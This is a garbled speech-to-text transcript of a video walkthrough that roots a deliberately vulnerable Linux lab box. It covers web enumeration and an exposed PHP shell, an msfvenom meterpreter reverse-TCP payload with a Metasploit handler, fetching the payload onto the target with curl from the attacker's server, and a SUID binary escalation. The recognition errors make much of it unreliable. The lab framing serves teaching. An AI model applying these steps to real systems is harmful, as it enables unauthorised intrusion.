Privilege Escalation Walkthrough: Linux

00:00

Welcome to part two of the privilege escalation lab. Now we're going to focus on the Lennox box.

00:08

So I hinted that it is a web based the foothold.

00:12

So we'll just go to this in a browser.

00:16

192168

00:19

one

00:20

1- five. Now

00:22

the name of this box is escalate.

00:25

So it's a value box. If you want to

00:29

research this with other walk throughs, I suggest that I'm just gonna do one exploitation path

00:36

to get to root. There are apparently 11 others,

00:40

So try all 11 if you want to.

00:43

Um But this is how you get better right through practice.

00:49

So Okay, so now I wanna I could use Derby on this.

00:56

There be

00:58

I told you I like to use what what web to see the technology. Of course we already know this is Apache,

01:03

but still what web?

01:10

Mhm.

01:11

See what we are.

01:18

Okay. Nothing, nothing. Earth shattering shattering here, we see is immune to.

01:25

So if I run Derby

01:34

and I specify for extension PHP

01:42

we see we have shelled out PHP. Well that makes things really easy.

01:49

Yeah,

01:53

So we're user six.

01:55

Okay, well let's get a foothold on this machine.

01:59

Okay. I said, I don't know. PHP shells aren't aren't the best. So I'm gonna use MSF venom

02:07

Payload is going to be Lennox x 86.

02:13

We can do interpreter. Let's let's mix things up here.

02:17

Reverse

02:19

TCP

02:21

L host

02:23

92,168,150

02:25

report equals for

02:30

4321

02:32

format itself.

02:37

Shell dot elf.

02:43

So because I'm using an interpreter, I now have to use

02:46

meh display

02:52

so I can split this.

02:54

I am going to do MSF console

03:05

now if you use multi handler right.

03:09

Use exploit multi handler

03:15

set

03:19

hey load

03:27

Sent. L host 1921681

03:31

50 set. Help port

03:36

4321

03:43

show options

03:46

looks right, You run and set this as a job in the background.

03:53

So now what would I need to do again is set up my

04:00

little server here,

04:11

don't specify another poor you can do that.

04:14

So now it's on Port 8888.

04:17

So what I can do from here

04:23

as I can

04:26

make sure that.

04:29

Okay this is on the desktop

04:33

curl http

04:36

192,168,150

04:40

8888 Shell

04:44

elf

04:45

output.

04:46

If you try to get this in this directory is not going to work. You don't have permission. So I always like to put things in temp

04:53

because it's globally readable. Writable executed. All right.

04:58

So first I have to ask that work

05:03

and we see the get request here.

05:08

So if you want to verify that we of course can do

05:13

LS.

05:14

And we see

05:15

that it's there. We did some odd this now

05:19

To let it execute commode 777.

05:24

Okay.

05:27

And now let's hope that

05:30

we can make this execute. It looks like it did.

05:34

All right.

05:39

So our sessions

05:44

session one.

05:46

Okay.

05:47

Let's drop into a shell.

05:49

Now you notice this is not the best show in the world.

05:53

So what I want to do is bin bash I

05:58

and that's much nicer isn't it?

06:00

So I want to look for sewage binaries. That's something that I like to do. I don't know what my password is. Right? So if I do Sudo L

06:10

while says no T T Y. Present

06:13

so

06:14

that this is even it looks nice. It's still a bad shell in my opinion.

06:17

Yeah,

06:17

but let's try to find sewage binaries

06:24

and this is how you do it

06:28

as soo ID

06:30

type

06:31

F.

06:33

And again, I think the bible for this or the manual is Got Milks

06:40

Lennox privilege escalation guide.

06:53

We'll see something interesting towards the end here.

07:01

Okay. I see something called Shell.

07:05

Is this a sewage binary?

07:08

And who owns it?

07:10

Yeah,

07:13

we see Root owns this and we see a little less

07:15

here. Okay.

07:17

And we see that we can execute it.

07:21

So what if we do that?

07:40

You can always see what this is. File. Shell

07:46

Elf

07:46

do strings if you want,

07:50

see what's going on in here

08:03

and we can always run this.

08:09

It's an arrow root.

08:13

So that's only one way. There are many, many others. And I would highly recommend

08:18

that you explore all those other ways to escalate privileges on this box and that's why I chose it because there's just so many different ways to do it.

08:26

So go ahead and find your own way to get to root on this box.